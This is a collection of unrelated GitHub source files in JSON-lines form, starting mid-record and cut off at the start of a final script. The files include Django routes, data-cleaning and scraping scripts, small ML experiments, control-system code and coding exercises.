path(\"CompanyProfile/\",CompanyProfileView.as_view(),name=\"CompanyProfile\"),\n path('company-act-opp-sch-list', ListActivityOppScholarViewSet.as_view(),name='act-opp-sch-list'),\n path('all-act-opp-sch-list/', ListAllActivityOppScholarViewSet.as_view(),name='all-applications-list'),\n path('applications-list/', ListUserActivityOppScholarViewSet.as_view(),name='user-applications-list')\n]","repo_name":"KexunNiu/Cloned-pathfinder2","sub_path":"backend/company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12156667786","text":"import numpy as np\n\nfrom metadata import train_lengths, device_ids\n\n\ndevice_features = np.loadtxt(open(\"features1.csv\",\"rb\"),delimiter=\",\")\nseq_features = np.loadtxt(open(\"sequence_features1.csv\",\"rb\"),delimiter=\",\")\n\n\nsubmission_file = open(\"submission1.csv\", 'a')\nsubmission_file.write(\"QuestionId,IsTrue\\n\")\n\n\ndef gaussian_probability(x, mean, std):\n return (1./(np.sqrt(2*np.pi)*std))*np.exp(-(((x - mean)/std)**2)/2)\n\nwith open(\"questions.csv\") as questions_file:\n temp = questions_file.readline()\n for line in questions_file:\n question_id, seq_id, dev_id = line.split(',')\n dev_id = dev_id[:-1]\n\n seq_id_int = int(seq_id)\n dev_id_int = int(dev_id)\n\n prob_x = 
gaussian_probability(seq_features[seq_id_int, 0], device_features[dev_id_int, 0], device_features[dev_id_int, 3])\n prob_y = gaussian_probability(seq_features[seq_id_int, 1], device_features[dev_id_int, 1], device_features[dev_id_int, 4])\n prob_z = gaussian_probability(seq_features[seq_id_int, 2], device_features[dev_id_int, 2], device_features[dev_id_int, 5])\n\n posterior = prob_x*prob_y*prob_z*train_lengths[device_ids.index(dev_id_int)]\n\n submission_file.write(question_id + \",\" + str(posterior)+'\\n')\n","repo_name":"sumeetfefar/kaggle-accelerometer-biometric","sub_path":"code/gen_submission1.py","file_name":"gen_submission1.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38800778839","text":"import re\n\nfrom pygls.workspace import position_from_utf16\nfrom pygls.lsp.types import Range, Position\nfrom pygls.workspace import Document as PyglsDocument\n\nfrom ._base import Base\n\n\nclass Document(Base):\n def parse_range(\n self, start_line: int, start_char: int, end_line: int, end_char: int\n ):\n \"\"\"\n Parses something like `0:0,23:3` to produce a \"selection\" range in a document\n \"\"\"\n if self.text_doc_uri is None:\n raise Exception\n\n if int(end_line) == -1:\n current_document = self.get_current_document()\n end_line = len(current_document.lines)\n\n if int(end_char) == -1:\n # NB:\n # `end_char` may need to use something like pygls.workspace.utf16_num_units(lines[-1])\n # in order to handle wide characters. I have seen some weirdness like a single char\n # being copied on every save. But it's hard to know what's going on behind the scenes.\n end_char = 0\n\n return Range(\n start=Position(line=start_line, character=start_char),\n end=Position(line=end_line, character=end_char),\n )\n\n def range_for_whole_document(self) -> Range:\n \"\"\"\n `0:0,-1:1` has the special meaning of: select the whole document.\n\n This is not a LSP convention.\n \"\"\"\n return self.parse_range(0, 0, -1, -1)\n\n def get_current_document(self) -> PyglsDocument:\n if self.text_doc_uri is None:\n raise Exception\n\n return self.server.get_document_from_uri(self.text_doc_uri)\n\n def get_wordish_under_cursor(self, cursor_position: Position) -> str:\n \"\"\"\n Get anything between whitespace\n \"\"\"\n if self.text_doc_uri is None:\n raise Exception\n doc = self.server.get_document_from_uri(self.text_doc_uri)\n # Doesn't start with whitespace\n re_start_word = re.compile(r\"[^\\s]*$\")\n # Doesn't end with whitespace\n re_end_word = re.compile(r\"^[^\\s]*\")\n word = doc.word_at_position(\n cursor_position, re_start_word=re_start_word, re_end_word=re_end_word\n )\n return word\n\n def get_line_under_cursor(self, cursor_position: Position) -> str:\n if self.text_doc_uri is None:\n raise Exception\n doc = self.server.get_document_from_uri(self.text_doc_uri)\n lines = doc.lines\n if cursor_position.line >= len(lines):\n return \"\"\n\n row, _ = position_from_utf16(lines, cursor_position)\n line = lines[row]\n return line\n","repo_name":"tombh/super-glass-lsp","sub_path":"super_glass_lsp/lsp/custom/features/_document.py","file_name":"_document.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"44"} +{"seq_id":"74409285894","text":"import pygame\nimport random\nimport numpy as np\nimport tensorflow as tf\n\n# Define constants\nSCREEN_WIDTH, SCREEN_HEIGHT = 400, 600\nBIRD_WIDTH, BIRD_HEIGHT = 40, 
40\nPIPE_WIDTH, PIPE_HEIGHT = 100, 300\nGRAVITY = 0.5\nPIPE_SPEED = 5\nBIRD_JUMP = -10\nNUM_GENERATIONS = 100\nNUM_BIRDS_IN_GENERATION = 100\n\n# Initialize Pygame\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Flappy Bird\")\n\n# Define the neural network model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(24, activation='relu', input_shape=(4,)),\n tf.keras.layers.Dense(2, activation='linear')\n])\ndef crossover_and_mutate(parent1, parent2, mutation_rate=0.01):\n child_weights = []\n \n # Assuming parent1 and parent2 are Keras models\n for layer1, layer2 in zip(parent1.layers, parent2.layers):\n # Crossover (average weights)\n new_weights = (layer1.get_weights()[0] + layer2.get_weights()[0]) / 2.0\n \n # Mutation\n mask = np.random.rand(*new_weights.shape) < mutation_rate\n mutation = np.random.randn(*new_weights.shape) * 0.1 # Adjust the mutation scale as needed\n new_weights = np.where(mask, new_weights + mutation, new_weights)\n \n child_weights.append(new_weights)\n \n # Create a new model with the child weights\n child_model = tf.keras.models.clone_model(parent1)\n child_model.build((None, input_size)) # Assuming input_size is known\n \n for layer, weights in zip(child_model.layers, child_weights):\n layer.set_weights([weights])\n\n return child_model\n\ndef softmax(logits):\n exp_logits = np.exp(logits)\n return exp_logits / np.sum(exp_logits)\n# Define a function to create a new generation of birds\ndef create_new_generation():\n global model # Используем глобальную переменную модели\n\n # Оценка производительности каждой птицы (пример: доли, пройденной дистанции)\n bird_scores = []\n\n # Задайте вероятности выбора каждой птицы на основе их оценок\n selection_probabilities = softmax(bird_scores)\n\n # Создайте новое поколение птиц\n new_generation = []\n\n for _ in range(NUM_BIRDS_IN_GENERATION):\n # Выбор двух родительских птиц с использованием вероятностей\n parent1, parent2 = np.random.choice(NUM_BIRDS_IN_GENERATION, size=2, p=selection_probabilities)\n\n # Создание потомка птицы (нейронной сети) путем скрещивания и мутации\n child_model = crossover_and_mutate(model[parent1], model[parent2])\n\n # Добавление потомка в новое поколение\n new_generation.append(child_model)\n\n # Обновление модели для нового поколения птиц\n model = new_generation\n\n# Main game loop\ndef main():\n bird_x = SCREEN_WIDTH // 4\n bird_y = SCREEN_HEIGHT // 2\n bird_velocity = 0\n pipes = []\n\n for generation in range(NUM_GENERATIONS):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n bird_velocity = BIRD_JUMP\n\n # Move bird\n bird_y += bird_velocity\n bird_velocity += GRAVITY\n\n # Generate pipes\n if len(pipes) == 0 or pipes[-1][\"x\"] < SCREEN_WIDTH - 200:\n pipe_height = random.randint(100, 400)\n pipes.append({\"x\": SCREEN_WIDTH, \"height\": pipe_height})\n\n # Move pipes\n for pipe in pipes:\n pipe[\"x\"] -= PIPE_SPEED\n\n # Remove off-screen pipes\n pipes = [pipe for pipe in pipes if pipe[\"x\"] > -PIPE_WIDTH]\n\n # Check for collisions\n for pipe in pipes:\n if bird_x < pipe[\"x\"] + PIPE_WIDTH and bird_x + BIRD_WIDTH > pipe[\"x\"]:\n if bird_y < pipe[\"height\"] or bird_y + BIRD_HEIGHT > pipe[\"height\"] + PIPE_HEIGHT:\n bird_x = SCREEN_WIDTH // 4\n bird_y = SCREEN_HEIGHT // 2\n bird_velocity = 0\n pipes = []\n create_new_generation()\n break\n\n # Draw everything\n screen.fill((255, 255, 255))\n 
pygame.draw.rect(screen, (0, 128, 0), (bird_x, bird_y, BIRD_WIDTH, BIRD_HEIGHT))\n for pipe in pipes:\n pygame.draw.rect(screen, (0, 0, 0), (pipe[\"x\"], 0, PIPE_WIDTH, pipe[\"height\"]))\n pygame.draw.rect(screen, (0, 0, 0), (pipe[\"x\"], pipe[\"height\"] + PIPE_HEIGHT, PIPE_WIDTH, SCREEN_HEIGHT))\n pygame.display.update()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fluke8/neuro-race-python","sub_path":"trash/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31413853233","text":"import re\nimport string\nimport stanza\nfrom spacy_stanza import StanzaLanguage\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\n\nclass TextCleaner:\n nlp = {}\n \n def __init__(self):\n snlp = stanza.Pipeline(lang=\"es\")\n self.nlp = StanzaLanguage(snlp)\n \n # Calls the clean function and tokenizes specially for Tweets (removes mentions, keep hashtags)\n def tokenize_tweet(self, tweet, hashtags):\n tknzr = TweetTokenizer(strip_handles=True)\n tweet_no_hashtag = tweet\n for hashtag in hashtags:\n tweet_no_hashtag = tweet_no_hashtag.replace('#' + hashtag[\"text\"], '')\n cleaned_tweet = self.clean_text(tweet_no_hashtag)\n return tknzr.tokenize(cleaned_tweet)\n \n # Checks if the given character is punctuation or not, excluding Twitter special chaarcters (@, #)\n def is_not_punctuation(self, char):\n is_punctuation = char not in string.punctuation.join([\"¡\", \"¿\", \"–\", \"“\", \"”\", \"¨\", \"•\", \"<\", \">\", \"…\", \"‘\", \"’\", \"«\", \"»\"])\n return is_punctuation or char == \"@\"\n \n # Removes numbers, emojis, punctuation, whitespaces and lowers all characters\n def clean_text(self, text):\n # remove numbers\n \n text_nonum = re.sub(r'\\d+', '', text)\n # remove emojis\n regrex_pattern = re.compile(pattern=\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\"\n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n u\"\\u003E\"\n u\"\\u003C\"\n u\"\\u200b\"\n \"]+\", flags=re.UNICODE)\n text_noemoji = regrex_pattern.sub(r'', text_nonum)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_noemoji if self.is_not_punctuation(char)])\n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n return text_no_doublespace\n \n # Removes stopwords based on nltk spanish stopwords and https://github.com/stopwords-iso/stopwords-es/blob/master/stopwords-es.txt\n def remove_stopwords(self, tweet, hashtags):\n tokens = self.tokenize_tweet(tweet, hashtags)\n return [token for token in tokens if not token in stopwords.words('spanish2') and \"http\" not in token and \"gt\" not in token and \"lt\" not in token]\n \n # Lemmatizes the remaining words, based on stanza's spanish NLP and using spacy-stanza NLP\n def lemmatize(self, tweet, hashtags):\n tokens = self.remove_stopwords(tweet, hashtags)\n for i in range(0, len(tokens)):\n if not tokens[i].startswith(\"#\"):\n 
doc = self.nlp(tokens[i])\n for token in doc:\n if token.lemma_ not in stopwords.words(\"spanish2\"):\n tokens[i] = token.lemma_\n print(tokens)\n return tokens\n ","repo_name":"jfmendez11/tweet_miner","sub_path":"tweet_tokenizer.py","file_name":"tweet_tokenizer.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1592271307","text":"#!/usr/bin/env python3\n\nimport configparser\nimport json\nimport sys\n\n\nc = configparser.ConfigParser(allow_no_value=True)\nwith open(sys.argv[1], 'r') as f:\n c.read_file(f)\n\nfor s in c.sections():\n for o in c.options(s):\n j = json.loads(c.get(s, o))\n\nc.write(sys.stdout)\n","repo_name":"renatahodovan/picireny","sub_path":"tests/resources/sut-inijson-load.py","file_name":"sut-inijson-load.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"44"} +{"seq_id":"41694169744","text":"import tensorflow as tf\n\n\nx = tf.constant(-2.0, name='x', dtype=tf.float32)\na = tf.constant(5.0, name='a', dtype=tf.float32)\nb = tf.constant(13.0, name='b', dtype=tf.float32)\n\ny = tf.Variable(tf.add(tf.multiply(a, x), b))\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"logs\", sess.graph)\n print(sess.run(y))\n\ntf.where()","repo_name":"enningxie/Coolixz","sub_path":"Tensorflow/from_blog/tensorflow01.py","file_name":"tensorflow01.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8928202496","text":"import numpy as np\r\n#import import_ipynb\r\nimport massSpringParam1 as P\r\n\r\nclass massSpringController:\r\n def __init__(self):\r\n self.observer_state = np.array([\r\n [0.0], # estimate of z\r\n [0.0], # estimate of z_hat\r\n [0.0], # estimate of disturbance\r\n ])\r\n self.tau_d1 = 0.0 #control force, delayed 1 sample\r\n self.integrator = 0.0 # integrator\r\n self.error_d1 = 0.0 # error signal, delyaed 1 sample\r\n self.K = P.K # state feedback gain\r\n self.ki = P.ki # Input gain\r\n self.L = P.L # observer gain\r\n self.Ld = P.Ld\r\n self.L2 = P.L2\r\n self.A2 = P.A2 # system model\r\n self.B2 = P.B2\r\n self.C2 = P.C2\r\n self.limit = P.tau_max # maximum force\r\n self.Ts = P.Ts # sample rate of controller\r\n \r\n def update(self, z_r, y_m):\r\n #update the observer and extract z_hat\r\n x_hat, d_hat = self.update_observer(y_m)\r\n z_hat = x_hat.item(0)\r\n \r\n #integrate error\r\n error = z_r - z_hat\r\n self.integrateError(error)\r\n \r\n #feedback linearizing force tau_fl\r\n tau_fl = P.k*z_hat\r\n \r\n # Compute the state feedback controller\r\n tau_tilde = -self.K @ x_hat - self.ki * self.integrator - d_hat\r\n \r\n #compute total force\r\n tau = self.saturate(tau_fl + tau_tilde.item(0))\r\n self.tau_d1 = tau\r\n \r\n return tau, x_hat, d_hat\r\n \r\n def integrateError(self, error):\r\n self.integrator = self.integrator + (self.Ts/2.0)*(error + self.error_d1)\r\n self.error_d1 = error\r\n \r\n def update_observer(self, y_m):\r\n #update the observer using RK4 integration\r\n F1 = self.observer_f(self.observer_state, y_m)\r\n F2 = self.observer_f(self.observer_state + self.Ts / 2 * F1, y_m)\r\n F3 = self.observer_f(self.observer_state + self.Ts / 2 * F2, y_m)\r\n F4 = self.observer_f(self.observer_state + self.Ts * F3, y_m)\r\n self.observer_state += self.Ts 
/ 6 * (F1 + 2 * F2 + 2 * F3 + F4)\r\n x_hat = np.array([[self.observer_state.item(0)],\r\n [self.observer_state.item(1)]])\r\n d_hat = self.observer_state.item(2)\r\n\r\n return x_hat, d_hat\r\n \r\n def observer_f(self, x_hat, y_m):\r\n #compute feedback linearizing force tau_fl\r\n z_hat = x_hat.item(0)\r\n tau_fl = P.k*z_hat\r\n \r\n # xhatdot = A*xhat + B*(u-ue) + L(y-C*xhat)\r\n xhat_dot = self.A2 @ x_hat + self.B2 * (self.tau_d1 - tau_fl) + self.L2 * (y_m - self.C2 @ x_hat)\r\n\r\n return xhat_dot\r\n \r\n def saturate(self, u):\r\n if abs(u) > self.limit:\r\n u = self.limit*np.sign(u)\r\n return u","repo_name":"Shirshakk-P/ControlSystems","sub_path":"x14/massSpringController.py","file_name":"massSpringController.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33570837797","text":"import random\nguess=5\nsecret_no=random.randint(1,101)\nn=1\nguess=int(input(\"enter the no: \"))\nwhile guess!=secret_no:\n if secret_noguess:\n print(\"no is greater than \",guess)\n n=n+1\n guess=int(input(\"enter the no: \"))\n \nprint(\"yes! you are right\")\nprint(\"you took chance:\",n )\n\n","repo_name":"adnan378/Notepad","sub_path":"Notepad/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"6141152677","text":"# .pal2nal to .fasta converter\ndef pal2nal_2_fasta(lines):\n# converts .pal2nal format to .fasta format\n# input:\n# lines - a list with lines of .pal2nal file as values\n# output:\n# a list with lines of .fasta format as values\n # delete first line in list\n lines = lines[1:len(lines)]\n\n # delete \"\\n\" in the and of every string\n for i in range(len(lines)):\n lines[i] = lines[i].rstrip()\n\n # find number of parts that make up a sequence line (it might be the same for all sequences in file because they are aligned)\n seq_parts_num = 0\n for i in range(1, len(lines)):\n line = lines[i]\n marker = \"sequence\"\n seq_parts_num += 1\n for symbol in line.lower():\n if symbol not in \"atgc\":\n marker = \"header\"\n break\n if marker == \"header\":\n seq_parts_num -= 1\n break\n\n # compute the quantity of lines between headers, number of headers\n header_gap = seq_parts_num + 1\n header_num = int(len(lines) / header_gap)\n\n # make list of header indexes in \"lines\" list\n header_indexes = []\n for i in range(header_num):\n header_indexes.append(i * header_gap)\n\n # add \">\" to the start of header, \"\\n\" to the end of header, \"\\n\" to the end of sequence\n for i in header_indexes:\n lines[i] = f\">{lines[i]}\\n\"\n lines[i + seq_parts_num] = f\"{lines[i + seq_parts_num]}\\n\"\n return(lines)\n","repo_name":"sofya-d/My_code","sub_path":"python_projects/Pal2nal_to_fasta.py","file_name":"Pal2nal_to_fasta.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16215947809","text":"n = int(input())\nres = []\nfor i in range(0, n):\n s = input()\n if(len(s) <= 10):\n res.append(s)\n else:\n fin = s[0] + str(len(s[1:-1])) + s[-1]\n res.append(fin)\nfor i in res:\n print(i)","repo_name":"AmunRha/ChallengeSet1","sub_path":"Codeforces/71A.py","file_name":"71A.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20497071960","text":"import 
apify_client\nfrom facebook_scraper import get_posts\n\nfrom config.db_Connexion import dbConnection\n#Using this Scrapper speed up the process of your IP and Facebook getting banned\nclass pageScrapper:\n NUM_PAGES = 5\n def __init__(self,page_id):\n self.page_id = page_id\n self.db_cnx = dbConnection()\n self.post_collection = self.db_cnx.getCollection('posts')\n self.comments_collection = self.db_cnx.getCollection('comments')\n self.full_posts_collection = self.db_cnx.getCollection('full_posts')\n pass\n def getPosts(self):\n allPosts = []\n posts =get_posts(self.page_id,\n pages = self.NUM_PAGES,\n options={\"progress\": True},\n #cookies=\"\"\n )\n self.full_posts_collection.insert_many(posts)\n for post in posts:\n if(not(post['comments'] == 0 )):\n #print(post)\n #WORKING\n print('Scrapped a Post : ',post['post_id'],\" From page :\",self.page_id)\n allPosts.append(post['post_id'])\n return allPosts\n\nclass apifyPageScrapper:\n key =\"\"\n actor_id = 'apify/facebook-posts-scraper'\n input_data = {\n \"maxRequestRetries\": 10,\n \"proxy\": {\n \"useApifyProxy\": True,\n \"apifyProxyGroups\": [\n \"RESIDENTIAL\"\n ],\n \"apifyProxyCountry\": \"TN\"\n },\n \"resultsLimit\": 10,\n \"startUrls\": [\n {\n \"url\": \"https://www.facebook.com/Presidence.tn\"\n },\n {\n \"url\": \"https://www.facebook.com/Sntri-الشركة-الوطنية-للنقل-بين-المدن-1733465710262703\"\n },\n {\n \"url\": \"https://www.facebook.com/Wallyscar\"\n },\n {\n \"url\": \"https://www.facebook.com/MunicipaliteLaGoulette/\"\n },\n {\n \"url\": \"https://www.facebook.com/Nahda.Tunisia\"\n }\n ]\n }\n def __init__(self):\n self.db_cnx = dbConnection()\n self.post_collection = self.db_cnx.getCollection('posts')\n self.client = apify_client.ApifyClient(self.key)\n def runSync(self):\n execution_info = self.client.actor(actor_id=self.actor_id).call(\n run_input=self.input_data,\n memory_mbytes = 4096,\n timeout_secs= 60*8\n )\n execution_id = execution_info['id']\n execution_details = self.client.run(run_id=execution_id).wait_for_finish()\n return execution_details\n def getItems(self,datasetId):\n execution_data = self.client.dataset(dataset_id=datasetId).list_items()\n for data in execution_data.items:\n if 'postId' in data :\n if(not(self.post_collection.find_one({\"postId\":data['postId']}))):\n self.post_collection.insert_one(data)\n else:\n pass\n elif 'postFacebookId' in data:\n if(not(self.post_collection.find_one({\"postId\":data['postFacebookId']}))):\n self.post_collection.insert_one({\"pageId\":data['facebookId'],\"postId\":data['postFacebookId']})\n else:\n pass\n else:\n pass\n return execution_data.items\n\n","repo_name":"NourTabib/facebook-comments-stream","sub_path":"scrapper/scrappers/pageScrapper.py","file_name":"pageScrapper.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70692964294","text":"from selenium import webdriver\nimport pytest\n#import time\n\nclass TestOrangeHRMTest():\n\n @pytest.fixture()\n def setup(self):\n global driver\n self.driver=webdriver.Chrome(\"C://Users/anaso/PycharmProjects/Selenium/Selenium Scripts/Drivers/chromedriver.exe\")\n self.driver.maximize_window()\n print(\"Browser Started\\n\")\n yield\n self.driver.close()\n\n\n def test_HomePageTitle(self,setup):\n self.driver.get(\"https://opensource-demo.orangehrmlive.com/index.php/dashboard\")\n #time.sleep(2)\n assert self.driver.title==\"OrangeHRM\"\n print(\"Title is matched\")\n\n def test_Login(self,setup):\n 
self.driver.get(\"https://opensource-demo.orangehrmlive.com/index.php/dashboard\")\n self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n self.driver.find_element_by_id(\"btnLogin\").click()\n assert self.driver.title==\"OrangeHRM\"\n print(\"Login Successfull\")\n\n\n\n\n\n","repo_name":"anandsoraganvi/webautomation","sub_path":"Selenium/Selenium Scripts/Scripts/test_Orange.py","file_name":"test_Orange.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40497762738","text":"\"\"\"\nThis package of functions cleans the raw data from the Austin Animal Center datasets.\nIt includes:\n- prep_outcomes_file\n- prep_intakes_file\n- merge_files\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n## Clean Outcomes\n\ndef prep_outcomes_file(outcomes):\n \"\"\"The raw file comes in with: \n - dates not in datetime format\n - column names have mixed cases and spaces\n - an age variable that needs to be replaced\n - unnecessary columns tht can be dropped\n - create some additional date variables to help merge later\n \n arguments\n outcomes: the raw file from the website\n returns clean dataset\"\"\"\n # Make column names easier to use\n outcomes.columns = outcomes.columns.str.lower()\n outcomes.columns = outcomes.columns.str.replace(' ', '_')\n\n # Convert date formats\n outcomes['date_o'] = outcomes.datetime.apply(lambda x: x[:10])\n\n outcomes['date_o'] = pd.to_datetime(outcomes['date_o'], format='%m/%d/%Y')\n outcomes['dob'] = pd.to_datetime(outcomes['date_of_birth'], format='%m/%d/%Y')\n\n # Create new age variable\n outcomes['age'] = outcomes.date_o - outcomes.dob\n outcomes['years_old'] = outcomes.age.apply(lambda x: x.days/365)\n\n outcomes['year'] = outcomes['date_o'].apply(lambda x: x.year)\n\n outcomes['month_o'] = outcomes['date_o'].apply(lambda x: x.month)\n outcomes['year'] = outcomes['date_o'].apply(lambda x: x.year)\n outcomes['weekday_o'] = outcomes['date_o'].apply(lambda x: x.weekday())\n\n outcomes.drop(columns = ['datetime', 'date_of_birth','age_upon_outcome', 'date_of_birth', 'breed', 'color','animal_type'], inplace=True )\n return outcomes\n\n\n# Let's repeat the cleaning process for intake date and create some new variables\n\ndef prep_intakes_file(intakes):\n \"\"\"The raw file comes in with: \n - dates not in datetime format\n - column names have mixed cases and spaces\n - unnecessary columns tht can be dropped\n - create some additional date variables to help merge later\n \n arguments\n intakes: the raw file from the website\n returns clean dataset\"\"\"\n\n # Update column names to be more friendly\n\n intakes.columns = intakes.columns.str.lower()\n intakes.columns = intakes.columns.str.replace(' ', '_')\n\n # Convert date formats\n intakes['date_i'] = intakes.datetime.apply(lambda x: x[:10])\n\n intakes['date_i'] = pd.to_datetime(intakes['date_i'], format='%m/%d/%Y')\n\n # Create more date variables\n intakes['month_i'] = intakes['date_i'].apply(lambda x: x.month)\n intakes['year'] = intakes['date_i'].apply(lambda x: x.year)\n intakes['weekday_i'] = intakes['date_i'].apply(lambda x: x.weekday())\n\n intakes.drop(columns =['datetime','monthyear','age_upon_intake'] , inplace = True)\n return intakes\n\ndef merge_files(intakes, outcomes):\n \"\"\"\n Merges intakes and outcomes datasets to create unique line for each animal in the shelter to capture full stories for each animal\n 
takes intakes file then outcomes file as arguments\n returns merged dataset\n \"\"\"\n # Merge intakes and outcomes on animal id and year\n animal_shelter_df = pd.merge(intakes, \n outcomes, \n on=['animal_id', 'year'], \n how='left', \n suffixes=('_intake', '_outcome'))\n\n # Filters out animals who have yet to have outcomes and keeps animals where outcome data is later than intake date\n animal_shelter_df = animal_shelter_df[(~animal_shelter_df['date_o'].isna()) \n & (animal_shelter_df['date_o'] > animal_shelter_df['date_i'])]\n\n # Creates new days_in_shelter variable\n animal_shelter_df['days_in_shelter'] = (animal_shelter_df['date_o'] - animal_shelter_df['date_i']).dt.days\n \n # Sorts the column names to be alphabetical\n animal_shelter_df = animal_shelter_df[animal_shelter_df.columns.sort_values()]\n return animal_shelter_df\n","repo_name":"learn-co-curriculum/dsc-mod1-template","sub_path":"code_folder/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13191769111","text":"'''\n121. 买卖股票的最佳时机\n给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。\n\n你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。\n\n返回你可以从这笔交易中获取的最大利润。如果你不能获取任何利润,返回 0 。\n示例 1:\n\n输入:[7,1,5,3,6,4]\n输出:5\n解释:在第 2 天(股票价格 = 1)的时候买入,在第 5 天(股票价格 = 6)的时候卖出,最大利润 = 6-1 = 5 。\n 注意利润不能是 7-1 = 6, 因为卖出价格需要大于买入价格;同时,你不能在买入前卖出股票。\n示例 2:\n\n输入:prices = [7,6,4,3,1]\n输出:0\n解释:在这种情况下, 没有交易完成, 所以最大利润为 0。\n提示:\n1 <= prices.length <= 105\n0 <= prices[i] <= 104\n'''\nclass Solution:\n # 最多交易一次\n def maxProfit(self, prices) -> int:\n if not prices:return 0\n ret = 0\n #profit[i][j] 第i天手上持股状态j时,持有的现金数\n profit = [[0 for i in range(3)] for i in range(len(prices))]\n # 没有股票 买入股票 卖出股票\n profit[0][0], profit[0][1], profit[0][2] = 0, -prices[0], 0\n for i in range(1, len(prices)):\n profit[i][0] = profit[i-1][0]\n profit[i][1] = max(profit[i-1][1], profit[i-1][0]-prices[i])\n profit[i][2] = profit[i-1][1] + prices[i]\n # ret = max(ret, profit[i][0], profit[i][1], profit[i][2])\n # 如果为1的话说明手上游没有出售的股票,正常是不会考虑这个的,最后都会将股票卖出,所以可以去掉 profit[i][1],为了工整也可以加入\n ret = max(ret, profit[i][2])\n return ret\n\nif __name__ == '__main__':\n s = Solution()\n prices = [7, 1, 5, 3, 6, 4]\n print('1', s.maxProfit(prices))\n prices = [7, 6, 4, 3, 1]\n print('1', s.maxProfit(prices))\n","repo_name":"electrolyteJ/algorithms","sub_path":"src/basic/_13_DynamicProgrammingAlgorithm_121.py","file_name":"_13_DynamicProgrammingAlgorithm_121.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34974835052","text":"import random \n \ndef SystematicSampling(dataMat,number): \n \n length=len(dataMat) \n k=length/number \n sample=[] \n i=0 \n if k>0 : \n while len(sample)!=number: \n sample.append(dataMat[0+i*k]) \n i+=1 \n return sample \n else : \n return RandomSampling(dataMat,number) ","repo_name":"jimenbian/GarvinBook","sub_path":"3.1/Systematic_sampling.py","file_name":"Systematic_sampling.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"44"} +{"seq_id":"17205023236","text":"from dotenv import load_dotenv\nfrom deepchem.molnet import load_tox21\nimport numpy as np\nfrom gptchem.tuner import Tuner\nfrom gptchem.gpt_classifier import GPTClassifier\nfrom gptchem.evaluator import evaluate_classification\nfrom fastcore.xtras import 
